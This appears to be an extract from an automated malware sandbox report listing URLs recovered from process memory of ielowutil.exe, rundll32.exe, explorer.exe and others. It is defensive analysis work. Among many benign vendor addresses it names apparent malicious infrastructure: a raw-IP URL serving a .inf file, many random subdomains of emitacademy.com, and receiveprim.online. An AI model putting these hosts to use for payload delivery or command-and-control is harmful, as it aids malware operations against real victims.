Source: ielowutil.exe, 00000015.00000003.3480804459.000000000332F000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489499087.0000000003330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.infU
Source: ielowutil.exe, 00000015.00000002.3490324911.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3482336905.000000000335D000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2877329785.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2876470901.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.infwW
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/g
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://65bxm.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://bxs6w.emitacademy.com
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3315328206.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3405241936.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://i1upy.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://j4itc.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://jzsuw.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://k8s2t.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://klmy8.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://l5cyt.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://nrokq.emitacademy.com
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/2
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/:
Source: explorer.exe, 00000016.00000000.2967940530.000000000D9B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3377163786.0000000010CC8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/R
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3315328206.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3405241936.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000016.00000000.3215020752.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3098289815.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3361859793.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2959798535.000000000D62D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000016.00000000.3231089686.0000000010DAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380338082.0000000010DAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngT
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://pr7r5.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://s249r.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://scg7p.emitacademy.com
Source: explorer.exe, 00000016.00000000.3174608985.0000000003440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3349273884.000000000AD60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3181130108.0000000003860000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000016.00000000.3370697955.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3224076856.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113269580.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 00000004.00000002.3038954866.0000000005061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://shono.emitacademy.com
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlT
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/images/mlogo.png
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/sitemap.xml
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: rundll32.exe, 00000017.00000002.6902823352.0000000005F9B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.receiveprim.online
Source: rundll32.exe, 00000017.00000002.6902823352.0000000005F9B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.receiveprim.online/tuid/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://y3w1s.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://zb379.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://active24.cz/objednavka/domain/availability/list
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm
Source: powershell.exe, 00000004.00000002.3038954866.0000000005061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/d
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/h
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/m
Source: explorer.exe, 00000016.00000000.3211706389.000000000D533000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3359295166.000000000D533000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=
Source: explorer.exe, 00000016.00000000.3343582629.0000000009B2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3107233989.000000000DA06000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000016.00000000.3228058220.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3376567897.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3121184764.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2979739268.0000000010BA0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?ok
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://blog.active24.cz//
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://customer.active24.com/
Source: explorer.exe, 00000016.00000000.3370697955.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3224076856.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113269580.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopy
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/085122-Hosting-a-Servery
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/162807-DNS-hosting?l=cs
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/757409-Bezpe%c4%8dnost
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%ad
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNS
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/932337-Spolupr%c3%a1ce
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/939671-Fakturace-a-platby
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Titillium
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterT
Source: powershell.exe, 00000004.00000003.2572303132.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/css/landing.css
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.eot
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.svg
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.ttf
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.woff
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/dns.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/dnssec.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/free.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/image.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/notify.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/redirect.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/superpage.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/android-icon-192x192.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-114x114.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-120x120.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-144x144.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-152x152.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-180x180.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-16x16.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-32x32.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-96x96.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/ms-icon-144x144.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/webmail_ikony_vlajky.png)
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/library/theme/hp16/style.css
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AACl6Lf.img
